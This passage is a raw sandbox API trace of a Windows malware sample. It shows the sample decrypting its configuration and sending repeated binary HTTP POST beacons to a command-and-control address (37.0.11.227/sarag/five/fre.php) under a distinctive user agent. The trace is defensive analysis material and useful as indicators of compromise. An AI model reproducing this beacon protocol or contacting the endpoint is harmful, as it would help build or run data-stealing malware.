returned 1 [0337.683] GetProcessHeap () returned 0x690000 [0337.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0337.683] GetProcessHeap () returned 0x690000 [0337.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0337.684] GetProcessHeap () returned 0x690000 [0337.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0337.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.736] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0337.751] GetProcessHeap () returned 0x690000 [0337.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0337.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.752] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0337.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.754] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0337.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.794] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0337.795] GetProcessHeap () returned 0x690000 [0337.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0337.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.796] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0337.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.798] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0337.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.800] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0337.800] GetProcessHeap () returned 0x690000 [0337.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0337.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.801] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0337.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.802] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0337.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.803] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0337.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.804] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0337.804] GetProcessHeap () returned 0x690000 [0337.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0337.805] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0337.805] GetProcessHeap () returned 0x690000 [0337.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0337.805] socket (af=2, type=1, protocol=6) returned 0xc14 [0337.807] connect (s=0xc14, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0337.846] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0337.846] GetProcessHeap () returned 0x690000 [0337.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0337.846] GetProcessHeap () returned 0x690000 [0337.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0337.847] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0337.848] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0337.848] GetProcessHeap () returned 0x690000 [0337.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0337.849] GetProcessHeap () returned 0x690000 [0337.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0337.849] GetProcessHeap () returned 0x690000 [0337.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0337.849] GetProcessHeap () returned 0x690000 [0337.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0337.850] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0337.851] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0337.851] GetProcessHeap () returned 0x690000 [0337.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0337.851] GetProcessHeap () returned 0x690000 [0337.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0337.852] send (s=0xc14, buf=0x6ad508*, len=242, flags=0) returned 242 [0337.852] send (s=0xc14, buf=0x6aba40*, len=159, flags=0) returned 159 [0337.853] GetProcessHeap () returned 0x690000 [0337.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0337.853] recv (in: s=0xc14, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0337.927] GetProcessHeap () returned 0x690000 [0337.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0337.928] GetProcessHeap () returned 0x690000 [0337.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0337.929] GetProcessHeap () returned 0x690000 [0337.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0337.929] GetProcessHeap () returned 0x690000 [0337.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0337.930] closesocket (s=0xc14) returned 0 [0337.930] GetProcessHeap () returned 0x690000 [0337.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0337.930] GetProcessHeap () returned 0x690000 [0337.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0337.931] GetProcessHeap () returned 0x690000 [0337.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0337.931] GetProcessHeap () returned 0x690000 [0337.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0337.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1964) returned 0xc14 [0337.934] Sleep (dwMilliseconds=0xea60) [0337.935] GetProcessHeap () returned 0x690000 [0337.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0337.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.936] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0337.972] GetProcessHeap () returned 0x690000 [0337.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0337.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.973] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0337.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.975] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0337.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.976] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0337.976] GetProcessHeap () returned 0x690000 [0337.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0337.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.978] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0337.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.980] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0337.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.981] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0337.981] GetProcessHeap () returned 0x690000 [0337.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0337.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.982] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0337.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.983] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0337.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.984] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0337.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.986] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0337.986] GetProcessHeap () returned 0x690000 [0337.986] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0337.986] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0337.986] GetProcessHeap () returned 0x690000 [0337.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0337.987] GetProcessHeap () returned 0x690000 [0337.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0337.989] GetProcessHeap () returned 0x690000 [0337.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0337.990] GetProcessHeap () returned 0x690000 [0337.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0337.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.991] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0338.005] GetProcessHeap () returned 0x690000 [0338.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0338.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.006] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0338.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.008] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0338.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.018] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0338.018] GetProcessHeap () returned 0x690000 [0338.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0338.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.022] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0338.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.025] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0338.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.026] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0338.026] GetProcessHeap () returned 0x690000 [0338.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0338.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.027] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0338.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.028] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0338.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.030] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0338.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.032] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0338.032] GetProcessHeap () returned 0x690000 [0338.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0338.032] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0338.032] GetProcessHeap () returned 0x690000 [0338.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0338.032] socket (af=2, type=1, protocol=6) returned 0xc18 [0338.032] connect (s=0xc18, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0338.059] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0338.059] GetProcessHeap () returned 0x690000 [0338.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0338.059] GetProcessHeap () returned 0x690000 [0338.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0338.060] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.061] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0338.061] GetProcessHeap () returned 0x690000 [0338.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0338.061] GetProcessHeap () returned 0x690000 [0338.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.061] GetProcessHeap () returned 0x690000 [0338.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0338.061] GetProcessHeap () returned 0x690000 [0338.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0338.062] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0338.063] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0338.063] GetProcessHeap () returned 0x690000 [0338.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0338.063] GetProcessHeap () returned 0x690000 [0338.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0338.063] send (s=0xc18, buf=0x6ad508*, len=242, flags=0) returned 242 [0338.064] send (s=0xc18, buf=0x6aba40*, len=159, flags=0) returned 159 [0338.064] GetProcessHeap () returned 0x690000 [0338.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0338.064] recv (in: s=0xc18, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0338.143] GetProcessHeap () returned 0x690000 [0338.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0338.144] GetProcessHeap () returned 0x690000 [0338.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0338.145] GetProcessHeap () returned 0x690000 [0338.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0338.145] GetProcessHeap () returned 0x690000 [0338.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0338.145] closesocket (s=0xc18) returned 0 [0338.146] GetProcessHeap () returned 0x690000 [0338.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0338.146] GetProcessHeap () returned 0x690000 [0338.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0338.146] GetProcessHeap () returned 0x690000 [0338.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0338.146] GetProcessHeap () returned 0x690000 [0338.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0338.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1968) returned 0xc18 [0338.148] Sleep (dwMilliseconds=0xea60) [0338.154] GetProcessHeap () returned 0x690000 [0338.154] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0338.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.155] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0338.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.160] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0338.166] GetProcessHeap () returned 0x690000 [0338.166] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0338.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.167] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0338.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.168] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0338.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.169] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0338.169] GetProcessHeap () returned 0x690000 [0338.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0338.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.173] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0338.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.174] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0338.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.175] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0338.175] GetProcessHeap () returned 0x690000 [0338.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0338.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.176] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0338.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.176] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0338.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.177] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0338.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0338.178] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0338.178] GetProcessHeap () returned 0x690000 [0338.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0338.178] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0338.178] GetProcessHeap () returned 0x690000 [0338.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0338.179] GetProcessHeap () returned 0x690000 [0338.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0338.179] GetProcessHeap () returned 0x690000 [0338.180] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0338.180] GetProcessHeap () returned 0x690000 [0338.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0338.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0338.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.187] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0338.195] GetProcessHeap () returned 0x690000 [0338.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0338.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0338.198] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, 